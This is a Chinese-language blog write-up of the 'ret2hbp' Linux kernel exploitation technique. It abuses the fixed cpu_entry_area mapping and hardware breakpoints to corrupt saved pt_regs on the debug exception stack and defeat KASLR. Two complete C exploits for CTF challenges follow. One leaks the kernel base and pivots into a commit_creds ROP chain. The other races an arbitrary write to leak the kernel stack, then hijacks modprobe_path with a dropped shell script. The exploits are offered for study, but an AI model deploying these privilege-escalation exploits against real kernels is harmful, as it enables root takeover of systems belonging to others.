ret2hbp 将任意地址写转为堆栈越界读写

Bringing back the stack attack…
KASLR最后的余晖罢了…

要在任意地址读的情况下绕过(defeat)KASLR,很自然的思路是寻找虚拟地址空间中未随机化的区域(如FG-KASLR的绕过方式).
cpu_entry_area mapping固定在0xfffffe0000000000.

关于cpu_entry_area的描述:
https://www.kernel.org/doc/html/latest/arch/x86/pti.html?highlight=cpu_entry_area#page-table-isolation-pti
总结一下,为引入KPTI,用户页表中需要保存进入和退出内核所需要的数据,这些数据就映射到一个固定的区域cpu_entry_area.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
* cpu_entry_area is a percpu region that contains things needed by the CPU
* and early entry/exit code. Real types aren't used for all fields here
* to avoid circular header dependencies.
*
* Every field is a virtual alias of some other allocated backing store.
* There is no direct allocation of a struct cpu_entry_area.
*/
struct cpu_entry_area {
/* One page for the GDT alias; on x86_64 it also acts as the guard page described below. */
char gdt[PAGE_SIZE];

/*
* The GDT is just below entry_stack and thus serves (on x86_64) as
* a read-only guard page. On 32-bit the GDT must be writeable, so
* it needs an extra guard page.
*/
#ifdef CONFIG_X86_32
char guard_entry_stack[PAGE_SIZE];
#endif
/* Entry stack, placed directly after the GDT page (or after the 32-bit guard page). */
struct entry_stack_page entry_stack_page;

#ifdef CONFIG_X86_32
/* 32-bit only: a guard page followed by the double-fault stack. */
char guard_doublefault_stack[PAGE_SIZE];
struct doublefault_stack doublefault_stack;
#endif

/*
* On x86_64, the TSS is mapped RO. On x86_32, it's mapped RW because
* we need task switches to work, and task switches write to the TSS.
*/
struct tss_struct tss;

#ifdef CONFIG_X86_64
/*
* Exception stacks used for IST entries with guard pages.
*/
struct cea_exception_stacks estacks;
#endif
/*
* Per CPU debug store for Intel performance monitoring. Wastes a
* full page at the moment.
*/
struct debug_store cpu_debug_store;
/*
* The actual PEBS/BTS buffers must be mapped to user space
* Reserve enough fixmap PTEs.
*/
struct debug_store_buffers cpu_debug_buffers;
};

其中的estacks是Interrupt-Stack的映射.
IST机制:
https://www.cs.utexas.edu/~vijay/cs378-f17/projects/AMD64_Architecture_Programmers_Manual.pdf#G14.908888
https://www.kernel.org/doc/html/latest/arch/x86/kernel-stacks.html

A new feature introduced in the AMD64 extensions is called the Interrupt Stack Table (IST), which also resides in the TSS and contains logical (segment+offset) stack pointers. If an interrupt descriptor table specifies an IST entry to use (there are 7), the processor will load the new stack from the IST instead. This allows known-good stacks to be used in case of serious errors (NMI or Double fault for example). Previously, the entry for the exception or interrupt in the IDT pointed to a task gate, causing the processor to switch to the task that is pointed by the task gate. The original register values were saved in the TSS current at the time the interrupt or exception occurred. The processor then set the registers, including SS:ESP, to a known value specified in the TSS and saved the selector to the previous TSS. The problem here is that hardware task switching is not supported on AMD64.

当某中断的IDT条目中IST序号不为0,则当该中断发生时会从TSS中无条件将栈切换到对应的Interrupt-Stack并进行异常处理.同时向栈中压入pt_regs结构.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Macro to enforce the same ordering and stack sizes.
 *
 * Expands to a member list: the DF, NMI, DB, MCE, VC and VC2 stacks, each
 * preceded by a guard array of `guardsize` bytes, followed by a final
 * IST_top_guard. DF/NMI/DB/MCE are EXCEPTION_STKSZ bytes; VC and VC2 are
 * `optional_stack_size` bytes.
 */
#define ESTACKS_MEMBERS(guardsize, optional_stack_size) \
char DF_stack_guard[guardsize]; \
char DF_stack[EXCEPTION_STKSZ]; \
char NMI_stack_guard[guardsize]; \
char NMI_stack[EXCEPTION_STKSZ]; \
char DB_stack_guard[guardsize]; \
char DB_stack[EXCEPTION_STKSZ]; \
char MCE_stack_guard[guardsize]; \
char MCE_stack[EXCEPTION_STKSZ]; \
char VC_stack_guard[guardsize]; \
char VC_stack[optional_stack_size]; \
char VC2_stack_guard[guardsize]; \
char VC2_stack[optional_stack_size]; \
char IST_top_guard[guardsize]; \

于是类似于早期内核栈中保存的pt_regs作栈迁移的手法,这里也可以直接栈迁移.

更强大的利用是,当内核触发该类异常时,若改变栈上的pt_regs结构,便可劫持内核.若内核在读一段内存时触发该类中断,攻击者通过漏洞更改rcx寄存器(通常用于循环中的计数),即可造成越界读,同理可以造成越界写.
而越界读写,无论是在堆上还是栈上,都是绕过(defeat)KASLR的有力手段.

具体来说,比如uname调用是一个很好的栈上的越界读取.

1
2
3
4
5
6
7
8
9
10
// >>> kernel/sys.c:1280
/* 1280 */ SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
/* 1281 */ {
/* 1282 */ struct new_utsname tmp;
/* 1283 */
/* 1284 */ down_read(&uts_sem);
/* 1285 */ memcpy(&tmp, utsname(), sizeof(tmp));
/* 1286 */ up_read(&uts_sem);
/* 1287 */ if (copy_to_user(name, &tmp, sizeof(tmp)))
/* 1288 */ return -EFAULT;

prctl_set_mm_map是一个很好的栈上的越界写入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// >>> kernel/sys.c:1955
/* 1955 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 1956 */ static int prctl_set_mm_map(int opt, const void __user *addr, unsigned long data_size)
/* 1957 */ {
// 目标栈上临时对象
/* 1958 */ struct prctl_mm_map prctl_map = { .exe_fd = (u32)-1, };
------
// 调用copy_from_user,结合任意地址写原语和硬件断点,做到栈溢出ROP攻击
/* 1973 */ if (copy_from_user(&prctl_map, addr, sizeof(prctl_map)))
/* 1974 */ return -EFAULT;
/* 1975 */
// 对prctl_map对象内容进行校验,失败后快速返回触发ROP,不多调用函数
/* 1976 */ error = validate_prctl_map_addr(&prctl_map);
/* 1977 */ if (error)
/* 1978 */ return error;

总结下攻击流程:
父进程fork出子进程victim
父进程ptrace victim,父进程给victim设置硬件断点
父进程fork出子进程trigger,循环触发任意地址写原语修改DEBUG Exception stack中的cx寄存器值
victim进程循环调用uname syscall,并检查buffer中是否发现stack leak,如果发现就发送给父进程
父进程拿着stack leak编写出ROP代码发送给victim
victim进程循环调用prctl syscall触发目标copy_from_user,直到发生栈溢出ROP提权。

在6.2版本后的内核已经为该区域加上了随机化,并不只是基址随机化,而是每个entry都进行了随机化.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
 * Assign every possible CPU its slot index (_cea_offset) inside the
 * cpu_entry_area mapping.
 *
 * Without KASLR the slot index is simply the CPU number. With KASLR each CPU
 * gets a random index below max_cea, re-drawn until it differs from the
 * indices already compared in the inner loop.
 */
static __init void init_cea_offsets(void)
{
unsigned int max_cea;
unsigned int i, j;

/* KASLR disabled: identity mapping, CPU i uses slot i. */
if (!kaslr_enabled()) {
for_each_possible_cpu(i)
per_cpu(_cea_offset, i) = i;
return;
}

/* Number of CPU_ENTRY_AREA_SIZE slots that fit in the map, minus one page. */
max_cea = (CPU_ENTRY_AREA_MAP_SIZE - PAGE_SIZE) / CPU_ENTRY_AREA_SIZE;

/* O(sodding terrible) */
for_each_possible_cpu(i) {
unsigned int cea;

again:
/* Draw a candidate slot, then scan CPUs up to and including i for a clash. */
cea = get_random_u32_below(max_cea);

for_each_possible_cpu(j) {
/* Collision with an existing offset: draw a new candidate. */
if (cea_offset(j) == cea)
goto again;

/* Stop once the scan has reached the CPU being assigned. */
if (i == j)
break;
}

per_cpu(_cea_offset, i) = cea;
}
}

/*
 * Return the virtual address of the cpu_entry_area belonging to `cpu`.
 *
 * The address is CPU_ENTRY_AREA_PER_CPU plus the CPU's slot index
 * (cea_offset(cpu)) times CPU_ENTRY_AREA_SIZE.
 *
 * Is called from entry code, so must be noinstr
 */
noinstr struct cpu_entry_area *get_cpu_entry_area(int cpu)
{
unsigned long va = CPU_ENTRY_AREA_PER_CPU + cea_offset(cpu) * CPU_ENTRY_AREA_SIZE;
/* Compile-time check: the struct must span a whole number of pages. */
BUILD_BUG_ON(sizeof(struct cpu_entry_area) % PAGE_SIZE != 0);

return (struct cpu_entry_area *) va;
}
EXPORT_SYMBOL(get_cpu_entry_area);

sycrop

分析

给了一次内核任意地址的四字节读和一次栈迁移的机会.
从cpu_entry_area读泄露kbase,fork出子进程触发一次硬件断点,在cpu_entry_area的异常处理栈中留下pt_regs结构.再栈迁移到其中的pt_regs结构,即可执行预先布置在通用寄存器中的ROP链.


EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#include <kernelpwn.h>
#include <stdio.h>
#include <stdlib.h>


/* Offset of debug register `num` within struct user, in the form PTRACE_POKEUSER expects. */
#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))

/*
 * Install a hardware data breakpoint on `addr` in the traced process `pid`.
 *
 * DR0 receives the watched address and DR7 enables it. Any ptrace failure is
 * reported through die().
 */
void create_hbp(pid_t pid, void *addr) {
    /* DR0: the address to watch. */
    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr)) {
        die("create hbp ptrace dr0: %m");
    }

    /*
     * DR7 control word:
     *   bit 0       - enable the DR0 breakpoint
     *   bit 8       - stop on the instruction that causes the exception
     *   bits 16, 17 - trigger on data read or write
     */
    unsigned long dr7_ctrl = 0;
    dr7_ctrl |= 1UL << 0;
    dr7_ctrl |= 1UL << 8;
    dr7_ctrl |= 1UL << 16;
    dr7_ctrl |= 1UL << 17;

    if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr7_ctrl)) {
        die("create hbp ptrace dr7: %m");
    }
}

/*
 * Body of the traced child process.
 *
 * It requests tracing and stops itself so the parent can install the hardware
 * breakpoint on buf, then loads chosen values into the general-purpose
 * registers and finally reads from buf, which is the watched access.
 * Per the write-up, the register values end up in the pt_regs saved on the
 * exception stack.
 */
void child_func()
{
ptrace(PTRACE_TRACEME,0,NULL,NULL);
/* Stop here; the parent waits for this stop before calling create_hbp(). */
raise(SIGSTOP);
logd("Child Weakup");

/*
 * Each register is loaded from the global variable named in the operand:
 * r15..r12 take pop_rdi, init_cred, commit_creds, swapgs_ret2user;
 * r11, r10, r9, r8, rax take user_rip, user_cs, user_rflags, user_sp, user_ss.
 * The last instruction dereferences rsi (= pbuf, the address of buf) and is
 * the data access the breakpoint is armed on.
 * NOTE(review): the asm has no clobber list, so the compiler is not told
 * that these registers are overwritten.
 */
__asm__(
".intel_syntax noprefix;"
"mov r15,pop_rdi;"
"mov r14,init_cred;"
"mov r13,commit_creds;"
"mov r12,swapgs_ret2user;"
"mov rbp, 0;"
"mov rbx, 0;"
"mov r11, user_rip;"
"mov r10, user_cs;"
"mov r9, user_rflags;"
"mov r8, user_sp;"
"mov rax, user_ss;"
"mov rcx, 0xdeadbeef;"
"mov rdx, 0xdeadbeef;"
"mov rsi, pbuf;"
"mov rdi, [rsi];"
".att_syntax;"
);
logd("Child Exit");
exit(1);
}

/* Scratch buffer; the parent arms the hardware breakpoint on its address. */
char buf[0x10];
/*
 * Address of buf stored as an integer so the inline asm can load it into rsi.
 * The explicit cast is required: initialising an integer from a pointer
 * without one is a constraint violation (a hard error in recent compilers).
 */
size_t pbuf = (size_t)buf;


/* Kernel addresses, filled in by main() from the leaked kernel base. */
size_t commit_creds;
size_t prepare_creds;
size_t init_cred;
size_t pop_rdi;
size_t swapgs_ret2user;

/*
 * Driver for the "sycrop" challenge solution.
 *
 * Per the write-up, the device offers one 4-byte kernel read and one stack
 * pivot; this program uses ioctl 0x5555 for the former and 0x6666 for the
 * latter. Flow: leak the kernel base, fork a traced child that triggers a
 * hardware breakpoint with prepared registers, then issue the pivot.
 */
int main()
{
setvbuf(stdout,NULL,_IONBF,0);
setvbuf(stderr,NULL,_IONBF,0);
save_status();
bind_core(0);

if((dev_fd = open("/dev/seven",O_RDWR))<0)
{
err_exit("open device");
}

/* Read 4 bytes at a fixed cpu_entry_area address and rebuild the 64-bit kernel base from them. */
kernel_base = (uint32_t)(ioctl(dev_fd,0x5555,0xfffffe0000000004))+
+0xffffffff00000000-0x1008e00ULL;
HEX("kernel_base",kernel_base);

/* Resolve the addresses used by child_func() relative to the leaked base. */
commit_creds = kernel_base+0x000bb5b0;
prepare_creds = kernel_base+0x000bb9a0;
init_cred = kernel_base+0x01a4cbf8;
pop_rdi = kernel_base+0x2c9d;
swapgs_ret2user = kernel_base+0x01000ed0 + 49;

int pid;
if((pid = fork())==0)
{
/* NOTE(review): reason for the +8 adjustment is not shown here - confirm. */
user_sp += 8;
child_func();
}

int status;

// Wait for the child to stop itself (SIGSTOP)
waitpid(pid,&status,0);

/* Arm the breakpoint on buf in the child, then let it run. */
create_hbp(pid,buf);
ptrace(PTRACE_CONT,pid,0,0);


// Wait for the child to hit the breakpoint
waitpid(pid,&status,0);
ptrace(PTRACE_CONT,pid,0,0);

// Wait for the child to exit
waitpid(pid,&status,0);


/* Second primitive: pass a fixed cpu_entry_area address to ioctl 0x6666. */
ioctl(dev_fd,0x6666,0xfffffe0000010f58);

}

hbp_attack_demo

分析

驱动就是一个无限制的任意写.利用就是之前所说,子进程1不断uname触发断点并查看是否泄露出内核栈,子进程2不断修改内核栈上的pt_regs.获取到内核地址后写modprobe_path读取flag.

在exc_debug函数下断点,查看rdi指向的空间,即为0xA8大小的pt_regs结构.
这里注意数据断点是会断在触发断点的那条访存指令的后一条指令,所以此时已经完成了8字节的一次拷贝.

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <kernelpwn.h>
#include <sys/utsname.h>

/* Receives the uname() output; also the address the hardware breakpoint is set on. */
char buf[0x1000];
/* View into buf at byte offset 0xE (set in leak_kstack), indexed in check(). */
size_t* aligin_buf;
/* Pipe used by the leaking child to hand kernel_base to the parent. */
int sync_pipe[2];

/*
 * Ask the driver to store `val` at `addr`.
 *
 * The request is a pair of 64-bit fields (address, value) passed by pointer
 * to ioctl command 0 on dev_fd. The ioctl result is not inspected.
 */
void arb_write(uint64_t addr,uint64_t val)
{
    struct write_req {
        uint64_t target;
        uint64_t value;
    } req;

    req.target = addr;
    req.value = val;

    ioctl(dev_fd, 0, &req);
}


/*
 * Inspect the most recent uname() output for a leaked value.
 *
 * Slot 51 of aligin_buf is accepted when its low 12 bits equal 0xb32 and it
 * is above 0xffffffff81000000. On a match, kernel_base is derived from it,
 * sent to the parent through sync_pipe, and this process then spins forever.
 * Returns normally when there is no match.
 *
 * The original also copied aligin_buf[47] into an unused local named
 * `canary`; that dead store has been removed.
 */
void check()
{
    if (((aligin_buf[51] & 0xfff) == 0xb32) && (aligin_buf[51] > 0xffffffff81000000))
    {
        kernel_base = aligin_buf[51] - 0xe0b32;
        logi("got kernel_base");
        write(sync_pipe[1], &kernel_base, 8);
        /* Stay parked after reporting the value to the parent. */
        while (1);
    }
}

/*
 * Body of the traced child: call uname() in a loop and run check() on each
 * result.
 *
 * The process requests tracing and stops itself first, so the parent can
 * install the hardware breakpoint on buf before the loop starts.
 *
 * Both pointer conversions below are now explicit; the implicit forms in the
 * original are incompatible-pointer-type constraint violations.
 */
void leak_kstack()
{
    logd("leak_kstack init");
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    raise(SIGSTOP);

    logd("leak_kstack start");

    /* check() indexes buf as size_t words starting at byte offset 0xE. */
    aligin_buf = (size_t *)(buf + 0xE);
    while (1)
    {
        uname((struct utsname *)buf);
        check();
    }

    /* Not reached: the loop above never terminates. */
    exit(0);
}



/*
 * Driver for the "hbp_attack_demo" challenge solution.
 *
 * Flow: fork a traced child that loops on uname(), install a hardware
 * breakpoint on buf in it, fork a second child that repeatedly calls
 * arb_write(), wait for kernel_base over the pipe, then overwrite
 * modprobe_path and run the helper scripts.
 *
 * Fix: setvbuf() takes (stream, buf, mode, size). The original passed
 * _IONBF in the buffer slot and 0 as the mode.
 */
int main()
{
    setvbuf(stdout, NULL, _IONBF, 0);
    save_status();
    bind_core(0);


    if ((dev_fd = open("/dev/vuln", O_RDWR)) < 0)
    {
        err_exit("open device");
    }

    int pid1, pid2;

    pipe(sync_pipe);
    if ((pid1 = fork()) == 0)
    {
        /* Child 1 only writes to the pipe. */
        close(sync_pipe[0]);
        leak_kstack();
    }

    /* The parent only reads from the pipe. */
    close(sync_pipe[1]);

    // Wait for child 1 to stop itself
    waitpid(pid1, NULL, 0);

    create_hbp(pid1, buf);

    // Child 2 races to overwrite regs.rcx
    if ((pid2 = fork()) == 0)
    {
        bind_core(1);
        logd("Trigger start");
        while (1)
        {
            arb_write(0xfffffe0000010fb0, 0x400);
        }
        exit(1);
    }

    ptrace(PTRACE_CONT, pid1, NULL, NULL);

    // Block until child 1 reports kernel_base
    read(sync_pipe[0], &kernel_base, 8);
    logd("Parent received kernel_base");
    HEX("kernel_base", kernel_base);
    kill(pid2, SIGKILL);


    logd("modify modprobe_path");
    size_t modprobe_path = kernel_base + 0x01e8b920;
    arb_write(modprobe_path, u64("/copy\0\0\0"));

    system("echo -ne '#!/bin/sh\n/bin/cp /flag /Pwned\n/bin/chmod 777 /Pwned' > /copy");
    system("chmod +x /copy");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /dummy");
    system("chmod +x /dummy");

    system("/dummy");

    logi("Pwned by HanQi...");
    system("cat /Pwned");
}

参考文章

https://veritas501.github.io/2023_03_22-%E4%B8%80%E7%A7%8D%E5%80%9F%E5%8A%A9%E7%A1%AC%E4%BB%B6%E6%96%AD%E7%82%B9%E7%9A%84%E6%8F%90%E6%9D%83%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90/
https://blog.csdn.net/qq_61670993/article/details/134980555
https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信